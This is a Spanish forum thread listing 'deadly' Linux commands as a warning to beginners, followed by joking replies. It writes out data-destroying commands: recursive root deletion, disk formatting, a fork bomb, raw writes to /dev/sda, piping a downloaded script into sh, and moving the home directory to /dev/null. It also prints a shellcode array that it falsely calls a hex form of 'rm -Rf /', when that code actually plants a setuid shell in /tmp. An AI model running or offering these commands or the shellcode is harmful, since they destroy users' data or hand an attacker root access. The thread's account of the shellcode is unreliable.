7 Comandos mortales para Linux

#1
Si eres nuevo en Linux, es probable que en algún momento te encuentres en algún foro o una sala de chat, con una persona malintencionada y poco inteligente que pretenda engañarte para que utilices comandos que puedan dañar tus archivos o incluso arruinar todo tu sistema operativo.
Para evitar que se presente este peligroso escenario, he aquí una lista de comandos mortales en Linux que deberían ser evitados:
_________________________________________________________________________________________________________________________

sudo rm -Rf /
Este comando eliminará a la fuerza y recursivamente (incluyendo subdirectorios), todos los archivos dentro del directorio raíz.
En otras palabras, significa: “Borra todo y MÁTATE!

****** Explicación del comando anterior *****

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es la versión hexadecimal de [rm -Rf / ], con la cual podría engañarse incluso a usuarios Linux más experimentados.
_________________________________________________________________________________________________________________________

mkfs.ext3 /dev/sda
Reformatea o elimina todos los archivos del dispositivo mencionado después del comando mkfs.
_________________________________________________________________________________________________________________________

: ( ) { : | : & } ; :
La ya conocida por muchos la bomba fork. Este comando hará que tu sistema ejecute un elevado número de procesos, hasta que el mismo se “cuelgue”. A menudo esto puede acarrear perdida de datos.
_________________________________________________________________________________________________________________________

cualquier_comando > /dev/sda
Con este comando, se envían bloques de datos al dispositivo indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una pérdida total de datos.
_________________________________________________________________________________________________________________________

wget http://fuente_de_origen_inseguro -O- | sh
Estamos descargando datos, posiblemente un script, de alguna fuente no muy confiable, e inmediatamente despues, estamos ordenando que se ejecute el archivo descargado. Nunca, nunca hagas esto.
_________________________________________________________________________________________________________________________

mv /home/tudirectoriodeusuario/* /dev/null
Este comando mueve todos los archivos dentro de tu directorio home, a un lugar que no existe, razón por la cual, nunca podrás ver tus archivos de nuevo.

PD. Si alguien sabe como configurar el control de brillo enUbuntu 10.04.1 de mas (+) o menos (-), para una MacBook Pro 2.53 Ghz, 4 Gb en Ram, Snow Leopard. Se lo agradecere :D ya que el brillo siempre esta en fuerte y no me permite bajarlo. !!! SALUDOS ¡¡¡
 

lai

Bovino adolescente
#3
Yo ya ejecute rm -rfv esta perrisimo, el sistema "siguen en pie" o mas o menos, te quedas solo con la terminal abierta, los paneles desaparecen los comando todos marcan no encontrado, esta de locos.

esta chido, si vas a formatear tu compu pruebalo esta perro.
 

MDSjogren

Bovino maduro
#4
Yo ya ejecute rm -rfv esta perrisimo, el sistema "siguen en pie" o mas o menos, te quedas solo con la terminal abierta, los paneles desaparecen los comando todos marcan no encontrado, esta de locos.

esta chido, si vas a formatear tu compu pruebalo esta perro.
a, que chido, no se me había ocurrido probar alguno de estos comandos antes de formatear mi compu.

Posiblemente la me reinstale el Ubuntu 10.10 solo por gusto (me encanta configurarlo una y otra vez). Entonces probaré varios de estos comandos mortales que me interesaron.


Y por cierto. CHida info carnal.
 

ianponches

Bovino maduro
#6
Yo ya ejecute rm -rfv esta perrisimo, el sistema "siguen en pie" o mas o menos, te quedas solo con la terminal abierta, los paneles desaparecen los comando todos marcan no encontrado, esta de locos.

esta chido, si vas a formatear tu compu pruebalo esta perro.
jejejejej
mira numas eso
justamente andaba buscando como eliminar todo antes de formatear y no conocia ese comando
jejejejejjeej
gracias ya lo tendre en cuenta para la proxima :p:metal:
 
#8
Vaya ... hasta que un post mas o menos decentón jejeje ya tenía tiempo que me pasaba por el foro y nanai.. muchas gracias... información básica para conocer...

sólo necesito un cable pa jalar internet y unas cuantas horas para aplicar sudo rm -Rf /...


sudo gracias bakuno! : )
 

lai

Bovino adolescente
#12
Entonces probaré varios de estos comandos mortales que me interesaron.
Dudo que puedas probar varios, al primero que ejecutes tu compu (el sistema) morira instantaneamente, para probar varios necesitarias reinstalar el sistema tantas veces como comandos quieras ejecutar.

Nadamas una pregunta wetmalware
cualquier_comando > /dev/sda este comando no causa daño a la info que hay en el disco? es decir, solo rompe la asociacion que hay entre el hardware y el dispositivo logico que maneja el sistema?
 

n666n

Bovino de alcurnia
#16
gracias viejo, buen aporte =)


aunque creo que no es muy bueno el conocer esto, quien sabe en manos de quien pueda caer, jaja
 
Arriba